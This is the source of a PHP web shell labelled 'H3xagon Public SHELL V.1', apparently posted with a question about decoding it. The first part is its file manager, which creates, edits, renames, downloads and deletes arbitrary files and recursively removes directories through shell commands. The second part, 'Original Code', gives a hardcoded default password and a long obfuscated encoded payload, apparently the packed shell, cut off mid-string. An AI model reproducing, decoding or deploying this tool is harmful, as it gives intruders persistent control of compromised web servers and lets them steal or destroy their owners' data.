<center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER['HTTP_HOST']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER['HTTP_HOST']; ?>"><div id='menu'>[ Reverse IP Lookup ] </a></center>
<br>
<?php
} elseif($_GET['act'] == 'newfile') {
	if($_POST['new_save_file']) {
		$newfile = htmlspecialchars($_POST['newfile']);
		$fopen = fopen($newfile, "a+");
		if($fopen) {
			$act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	}
	echo $act;
	echo "<form method='post'>
	Filename: <input type='text' name='newfile' value='$dir/h3xagonkill.php' style='width: 450px;' height='10'>
	<input type='submit' name='new_save_file' value='Submit'>
	</form>";
} elseif($_GET['act'] == 'newfolder') {
	if($_POST['new_save_folder']) {
		$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
		if(!mkdir($new_folder)) {
			$act = "<font color=red>permission denied</font>";
		} else {
			$act = "<script>window.location='?dir=".$dir."';</script>";
		}
	}
	echo $act;
	echo "<form method='post'>
	Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
	<input type='submit' name='new_save_folder' value='Submit'>
	</form>";
} elseif($_GET['act'] == 'rename_dir') {
	if($_POST['dir_rename']) {
		$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
		if($dir_rename) {
			$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	echo "".$act."<br>";
	}
	echo "<form method='post'>
	<input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
	<input type='submit' name='dir_rename' value='rename'>
	</form>";
} elseif($_GET['act'] == 'delete_dir') {
	if(is_dir($dir)) {
		if(is_writable($dir)) {
			@rmdir($dir);
			@exe("rm -rf $dir");
			@exe("rmdir /s /q $dir");
			$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
		} else {
			$act = "<font color=red>could not remove ".basename($dir)."</font>";
		}
	}
	echo $act;
} elseif($_GET['act'] == 'view') {
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
	if($_POST['save']) {
		$save = file_put_contents($_GET['file'], $_POST['src']);
		if($save) {
			$act = "<font color=lime>Saved!</font>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	echo "".$act."<br>";
	}
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<form method='post'>
	<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
	<input type='submit' value='Save' name='save' style='width: 500px;'>
	</form>";
} elseif($_GET['act'] == 'rename') {
	if($_POST['do_rename']) {
		$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
		if($rename) {
			$act = "<script>window.location='?dir=".$dir."';</script>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	echo "".$act."<br>";
	}
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<form method='post'>
	<input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
	<input type='submit' name='do_rename' value='rename'>
	</form>";
} elseif($_GET['act'] == 'delete') {
	$delete = unlink($_GET['file']);
	if($delete) {
		$act = "<script>window.location='?dir=".$dir."';</script>";
	} else {
		$act = "<font color=red>permission denied</font>";
	}
	echo $act;
} else {
	if(is_dir($dir) === true) {
		if(!is_readable($dir)) {
			echo "<font color=red>can't open directory. ( not readable )</font>";
		} else {
			echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
			<tr>
			<th class="th_home"><center>Nama</center></th>
			<th class="th_home"><center>Tipe</center></th>
			<th class="th_home"><center>Ukuran</center></th>
			<th class="th_home"><center>Terakhir Dimodifikasi</center></th>
			<th class="th_home"><center>Owner/Group</center></th>
			<th class="th_home"><center>Permission</center></th>
			<th class="th_home"><center>Aksi</center></th>
			</tr>';
			$scandir = scandir($dir);
			foreach($scandir as $dirx) {
				$dtype = filetype("$dir/$dirx");
				$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
				if(function_exists('posix_getpwuid')) {
					$downer = @posix_getpwuid(fileowner("$dir/$dirx"));
					$downer = $downer['name'];
				} else {
					//$downer = $uid;
					$downer = fileowner("$dir/$dirx");
				}
				if(function_exists('posix_getgrgid')) {
					$dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
					$dgrp = $dgrp['name'];
				} else {
					$dgrp = filegroup("$dir/$dirx");
				}
 				if(!is_dir("$dir/$dirx")) continue;
 				if($dirx === '..') {
 					$href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
 				} elseif($dirx === '.') {
 					$href = "<a href='?dir=$dir'>$dirx</a>";
 				} else {
 					$href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
 				}
 				if($dirx === '.' || $dirx === '..') {
 					$act_dir = "<a href='?act=newfile&dir=$dir'>New File</a> | <a href='?act=newfolder&dir=$dir'>New Folder</a>";
 					} else {
 					$act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>Rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>Delete</a>";
 				}
 				echo "<tr>";
 				echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
				echo "<td class='td_home'><center>$dtype</center></td>";
				echo "<td class='td_home'><center>-</center></th></td>";
				echo "<td class='td_home'><center>$dtime</center></td>";
				echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
				echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
				echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
				echo "</tr>";
			}
		}
	} else {
		echo "<font color=red>can't open directory.</font>";
	}
		foreach($scandir as $file) {
			$ftype = filetype("$dir/$file");
			$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
			$size = filesize("$dir/$file")/1024;
			$size = round($size,3);
			if(function_exists('posix_getpwuid')) {
				$fowner = @posix_getpwuid(fileowner("$dir/$file"));
				$fowner = $fowner['name'];
			} else {
				//$downer = $uid;
				$fowner = fileowner("$dir/$file");
			}
			if(function_exists('posix_getgrgid')) {
				$fgrp = @posix_getgrgid(filegroup("$dir/$file"));
				$fgrp = $fgrp['name'];
			} else {
				$fgrp = filegroup("$dir/$file");
			}
			if($size > 1024) {
				$size = round($size/1024,2). 'MB';
			} else {
				$size = $size. 'KB';
			}
			if(!is_file("$dir/$file")) continue;
			echo "<tr>";
			echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
			echo "<td class='td_home'><center>$ftype</center></td>";
			echo "<td class='td_home'><center>$size</center></td>";
			echo "<td class='td_home'><center>$ftime</center></td>";
			echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
			echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
			echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>Edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>Rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>Delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>Download</a></td>";
			echo "</tr>";
		}
		echo "</table>";
		if(!is_readable($dir)) {
			//
		} else {
			echo "<hr>";
		}
		echo "<center><a href='?dir=$dir&do=disablefunc'>( Disable Function )</a></center>";
	echo "<center>Copyright &copy; ".date("Y")." - <a href='http://h3xagon.juraganhosting.asia/' target='_blank'><font color=lime>H3xagon</font></a></center>";
}
?>
</html>

Did this file decode correctly?

Original Code

<?php
/*
<=- H3xagon Public SHELL V.1 -=>
Pass Default : mhantabmhanx
*/
$h3xagon_pass = "mhantabmhanx"; // Anda Dapat mengubah password shell ini
$h3xagon = "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